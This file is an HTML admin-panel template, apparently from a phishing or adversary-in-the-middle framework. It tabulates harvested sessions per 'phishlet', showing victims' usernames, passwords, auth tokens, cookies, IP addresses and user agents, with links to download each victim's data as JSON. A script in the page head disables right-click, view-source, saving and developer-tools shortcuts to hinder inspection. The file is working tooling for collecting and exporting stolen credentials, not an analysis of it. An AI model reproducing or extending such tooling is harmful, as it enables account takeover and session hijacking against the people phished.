<head>
    <title>Admin panel</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css">
    <style>
        td {max-width: 700px !important;}
        td p {text-overflow: ellipsis; white-space: nowrap; overflow: hidden; padding: 3px 5px;}
    </style>
    <script>
        window.onkeydown = (e) => {
            return !(e.ctrlKey && (e.keyCode === 67 || e.keyCode === 85 || e.keyCode === 86 || e.keyCode === 88 || e.keyCode === 117));
        };

        window.addEventListener("keydown", (e) => {if (e.ctrlKey && e.which === 83) {e.preventDefault(); return false}});

        window.addEventListener("contextmenu", (event) => event.preventDefault());

        document.onkeydown = (e) => {
            if (e.keyCode === 123) {return false}
            if (e.ctrlKey && e.keyCode === "E".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.shiftKey && e.keyCode === "I".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.shiftKey && e.keyCode === "J".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.keyCode === "U".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.keyCode === "S".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.keyCode === "H".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.keyCode === "A".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.keyCode === "F".charCodeAt(0)) {return false}
            if (e.ctrlKey && e.keyCode === "E".charCodeAt(0)) {return false}
        }
    </script>
</head>
<body>
<div>
    <div class="container" style="width: 100%;  max-width: none !important;">
        <div class="notification is-primary">
            {{ with .Admin }}
            <h1> {{ . }} Admin panel</h1>
            {{ end }}
        </div>
    </div>

    <div class="table-container">
        <table class="table">
            <thead>
            <tr>
                <th>ID</th>
                <th>Site</th>
                <th>Username</th>
                <th>Password</th>
                <th>Custom Details</th>
                <th>HttpTokens</th>
                <th>BodyTokens</th>
                <th>Cookies</th>
                <th>IP Address</th>
                <th>Useragent</th>
                <th>Last Modified</th>
            </tr>
            </thead>
            <tbody>
            {{range .Sessions}}
            <tr>
                <th>{{.ID}}</th>
                <td>{{.Phishlet}}</td>
                <td>{{.Username}}</td>
                <td>{{.Password}}</td>
                <td>{{.Custom}}</td>
                <td>
                    <a href="data:application/json" download="{{.Username}}.json">Link</a>
                    <p>{{.HttpTokens}}</p>
                </td>
                <td>
                    <a href="data:application/json" download="{{.Username}}.json">Link</a>
                    <p>{{.BodyTokens}}</p>
                </td>
                <td>
                    <a href="data:application/json" download="{{.Username}}.json">Link</a>
                    <p>{{.CookiesTokens}}</p>
                </td>
                <td>{{.Remote_addr}}</td>
                <td>{{.Useragent}}</td>
                <td>{{.Update_time}}</td>
            </tr>
            {{end}}
            </tbody>
        </table>
    </div>
</div>
</body>